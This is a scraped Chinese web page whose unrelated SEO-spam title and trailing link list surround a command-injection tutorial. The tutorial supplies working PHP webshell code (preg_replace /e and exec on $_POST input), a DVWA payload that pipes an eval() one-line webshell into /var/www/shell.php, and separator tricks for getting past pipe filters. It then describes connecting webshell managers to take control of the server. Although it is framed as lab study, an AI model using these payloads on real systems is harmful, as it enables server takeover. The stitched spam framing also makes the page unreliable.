当前位置: 首页 > news >正文

网站白名单是什么意思有没有找人做标书的网站

网站白名单是什么意思,有没有找人做标书的网站,陕西最新消息今天,轻松做网站环境准备 这篇文章旨在用于网络安全学习#xff0c;请勿进行任何非法行为#xff0c;否则后果自负。 一、攻击相关介绍 原理 主要是输入验证不严格、代码逻辑错误、应用程序或系统中缺少安全机制等。攻击者可以通过构造特定的输入向应用程序或系统注入恶意代码#xff…环境准备 这篇文章旨在用于网络安全学习请勿进行任何非法行为否则后果自负。  一、攻击相关介绍 原理 主要是输入验证不严格、代码逻辑错误、应用程序或系统中缺少安全机制等。攻击者可以通过构造特定的输入向应用程序或系统注入恶意代码从而在受攻击的主机上执行任意命令。 使用方法 通过Web应用程序的输入字段注入恶意命令例如在表单、URL参数、HTTP头等中注入恶意命令。利用操作系统的命令执行函数或系统调用执行攻击者构造的恶意命令。利用应用程序的漏洞例如文件上传功能上传恶意文件并执行其中的命令。 使用前提 目标应用程序存在命令执行漏洞即没有对用户输入进行正确的过滤、验证或转义。攻击者能够与目标应用程序进行交互例如能够提交表单、发送请求等。攻击者能够构造恶意输入并将其注入到应用程序中。 常见的命令执行类型 远程命令执行Remote Command Execution攻击者通过远程发送恶意请求或利用应用程序的漏洞成功地执行远程系统命令。这种类型的漏洞通常涉及网络通信和远程执行代码。 本地命令执行Local Command Execution攻击者通过直接访问受影响系统利用应用程序的漏洞执行本地系统命令。这种类型的漏洞通常涉及身份验证绕过或本地文件包含等问题。 代码注入Code Injection攻击者通过向应用程序输入注入恶意代码来实现执行任意命令的目的。常见的代码注入包括SQL注入、OS命令注入和LDAP注入等。 命令拼接Command Concatenation攻击者通过利用应用程序对命令字符串的错误处理将恶意命令与原始命令拼接在一起导致执行恶意操作。常见的拼接方式包括使用特殊字符、绕过命令过滤等手法。 二、攻击复现 远程代码执行 - preg_replace函数示例 在php的www目录下创建一个preg_replace.php文件内容如下 ?php preg_replace(/test/e,$_POST[cmd],just test);? 然后使用工具连接菜刀、蚁剑、或浏览器插件都可以 都连接上了想干嘛就干嘛  远程系统命令执行 在php的www目录下创建一个exec.php文件内容如下 ?php $cmd$_POST[cmd];exec($cmd,$return); // 执行$cmd并把结果给数组$returnvar_dump($return) // 输出$return ? 或者在DVWA靶场上复现 如127.0.0.1ipconfig             (ipconfig是查看主机的ip信息 通过命令执行写入一句话马 攻击payload 127.0.0.1 | echo ?php eval(\$_POST[\cmd\])? /var/www/shell.php 这个命令的目的是在服务器上创建一个名为 shell.php 的文件其中包含 PHP 代码。让我们逐步分析该命令 127.0.0.1: 这是一个IP地址本地回环地址代表要连接的目标主机。 |管道符号用于将前一个命令的输出作为后一个命令的输入。 echo ?php eval(\$_POST[\cmd\])?: 这是一个echo命令它将字符串 ?php eval(\$_POST[cmd])? 输出到标准输出。 重定向操作符将前一个命令的输出写入到后一个命令指定的文件中。 /var/www/shell.php这是目标文件路径表示要将输出写入到 /var/www/ 目录下的名为 shell.php 的文件。 综上所述如果成功执行此命令则会在服务器的 /var/www/ 目录下创建一个名为 shell.php 的文件并将 ?php eval(\$_POST[cmd])? 的内容写入到该文件中。由于该PHP代码使用了 eval 函数它会执行用户在 POST 请求通过 cmd 参数中输入的命令。 下面是一些常见的命令连接符及其作用如果管道符“|”被过滤了就可以使用其他的代替 将两个命令并行执行无论前一个命令是否成功。 只有当前一个命令成功执行时才会执行后一个命令。 |将前一个命令的输出作为后一个命令的输入。 ||只有当前一个命令执行失败时才会执行后一个命令。 复现 ​ 在靶机中查看木马文件  最后就能在靶机看到我们的文件了我们的文件保存在/var/www/目录下查看方法 cd  /var/www/    -  ls          # 之后就能看到/var/www/下的文件信息 ​ 我跟喜欢使用xfp 7与xshell 7来输入命令与查看文件 ​ 使用蚁剑或菜刀连接木马 ​ ​  成功进入目标文件管理界面攻击复现成功 ​ 注意虽然我们的shell.php木马文件存放在/var/www/目录下但是我们连接只需要使用靶机IP文件名即可。因为Web服务器已经将根目录设置为 /var/www/所以不需要在 URL 中显式指定该目录。只需使用 http://IP地址/文件名 的格式即可访问该文件。
http://www.yutouwan.com/news/489011/

相关文章:

  • 开发做游戏的网站智能建站官网
  • 不花钱的网站怎么做网站生成工具
  • 免费php网站开发模板大连网站制作师
  • 网站优化排名优化建设网站的命令
  • 淘宝提货网站怎么做的win10系统可以做网站搭建
  • 平舆网站建设外贸网站 海外推广
  • 建一个电商网站要多少钱东莞外贸网站建站
  • 承德市建设局网站wordpress简单广告框修改
  • wordpress站演示有网络网站打不开怎么回事啊
  • 莱阳网站开发asp网站免费模板下载
  • 江西天亿建设有限公司网站免费制作视频的软件手机版
  • 龙岗网站建设流程短视频运营策划
  • 山西品牌网站建设太原搜索引擎推广
  • 简述网站开发的过程手机网站开发公司
  • vps被攻击网站打不开ping值高网站建设注意事情
  • 我想在阿里巴巴做卫生纸的网站社交媒体营销策略有哪些
  • wordpress主题 外贸网站当牛做吗网站源代码分享
  • 松阳县建设局网站公示怎么注册电力建设公司网站
  • 南京制作公司网站移动端4060相当于桌面端什么显卡
  • 个人电子商务网站建设wordpress外链略缩图
  • 制作静态网站免费微信小程序免费制作平台
  • 现在网站的外部链接怎么做wordpress 文章时间
  • 产品类网站模板安阳网站制作价格
  • 做美陈3d模型网站wordpress研究
  • 做网站要掌握几种语言化工设计网站
  • 做网站需要什么域名wordpress换主题影响seo吗
  • 郑州建设电商网站雨伞设计公司logo
  • 跨境网站有哪些平台做公司网站有什么需要注意的
  • 妇女之家网站建设方案公司主页填什么
  • 建设网站赚钱的方法个人参与防疫工作总结